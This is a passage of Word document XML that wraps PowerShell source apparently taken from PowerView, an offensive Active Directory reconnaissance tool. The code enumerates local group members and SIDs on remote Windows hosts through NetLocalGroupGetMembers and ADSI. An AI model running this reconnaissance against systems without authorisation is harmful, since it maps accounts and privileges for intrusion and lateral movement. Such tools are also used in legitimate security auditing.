        <w:t xml:space="preserve">                $TotalRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C04276" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ResumeHandle = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C25A05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C0451A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the local user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBD335B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result = $Netapi32::NetLocalGroupGetMembers($Server, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61681308" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70AF061A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589F861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Offset = $PtrInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A4821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A7DD7E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $LocalUsers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFADEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2250391D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # 0 = success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABC31B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (($Result -eq 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68DE24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="141EE452" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029DE15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61397942" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74EDCA91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618112FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    for ($i = 0; ($i -lt $EntriesRead); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2468F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B199CD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A2A31F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58ACE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66ED4506" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Offset = $NewIntPtr.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DD8BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F0912A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34FDF58A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SidString = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC17D96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB9DC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19E10E00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Result2 -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2D1A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9170E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4E5C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440EA116" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00469486" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser | Add-Member Noteproperty 'ComputerName' $Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC8FC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser | Add-Member Noteproperty 'AccountName' $Info.lgrmi2_domainandname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3A600" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser | Add-Member Noteproperty 'SID' $SidString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264096B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12CA2949" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709EA012" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FC87B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUser.PSObject.TypeNames.Add('PowerView.LocalUserAPI')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6AC690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A505EC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $LocalUsers += $LocalUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3850B150" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF2CAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D517775" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3960AD74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # free up the result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB0EFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AABD33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61293DB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # try to extract out the machine SID by using the -500 account as a reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630AC5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $MachineSid = $LocalUsers | Where-Object {$_.SID -like '*-500'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450FEF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Parts = $MachineSid.SID.Split('-')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025236C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $MachineSid = $Parts[0..($Parts.Length -2)] -join '-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270B489B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76ED2884" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalUsers | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338485E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        if($_.SID -match $MachineSid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CEDBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_ | Add-Member Noteproperty 'IsDomain' $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3978DF86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23F82F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5217B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_ | Add-Member Noteproperty 'IsDomain' $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32122FA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA9D1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A4903" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FCC15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F853338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440AD345" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57D56E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA3D539" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37B3B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05F63C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527491D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # otherwise we're using the WinNT service provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0AE713" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FB02D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($ListGroups) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2673E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if we're listing the group names on a remote server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70386E27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Computer = [ADSI]"WinNT://$Server,computer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6D231" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="151A7DBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Computer.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345690A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F74993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group | Add-Member Noteproperty 'Server' $Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE8B7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group | Add-Member Noteproperty 'Group' ($_.name[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9C9EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier $_.objectsid[0],0).Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72542D36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group | Add-Member Noteproperty 'Description' ($_.Description[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22575F97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $Group.PSObject.TypeNames.Add('PowerView.LocalGroup')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFAD7C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34E8C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2DAF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26B97B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA65A4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise we're listing the group members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE34C23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Members = @($([ADSI]"WinNT://$Server/$GroupName,group").psbase.Invoke('Members'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CECA079" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CD51FEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Members | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77364BAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7901BC07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529761BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member | Add-Member Noteproperty 'ComputerName' $Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D599E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DB3C098" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $AdsPath = ($_.GetType().InvokeMember('Adspath', 'GetProperty', $Null, $_, $Null)).Replace('WinNT://', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0318E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Class = $_.GetType().InvokeMember('Class', 'GetProperty', $Null, $_, $Null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9E01C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="400795F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # try to translate the NT4 domain to a FQDN if possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E113869" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Name = Convert-ADName -ObjectName $AdsPath -InputType 'NT4' -OutputType 'Canonical'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE14DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $IsGroup = $Class -eq "Group"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32638B40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FE1E0CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($Name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A0E6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $FQDN = $Name.split("/")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087A83C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $ObjName = $AdsPath.split("/")[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DFAB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Name = "$FQDN/$ObjName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D96F334" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $IsDomain = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCCD62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67600AFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A922C0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                $ObjName = $AdsPath.split("/")[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0EC02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Name = $AdsPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AB0D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $IsDomain = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3DFC38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101D653" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E87E9CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member | Add-Member Noteproperty 'AccountName' $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F210111" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member | Add-Member Noteproperty 'IsDomain' $IsDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032A75E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $Member | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B91D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3826FD5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($IsDomain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD28FDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # translate the binary sid to a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE5B1CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($_.GetType().InvokeMember('ObjectSID', 'GetProperty', $Null, $_, $Null),0)).Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2FF3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'Description' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27665AA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $Member | Add-Member Noteproperty 'Disabled' ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB0281C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CFF8E8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                if($IsGroup) {</w:t>
      </w:r>
    </w:p>
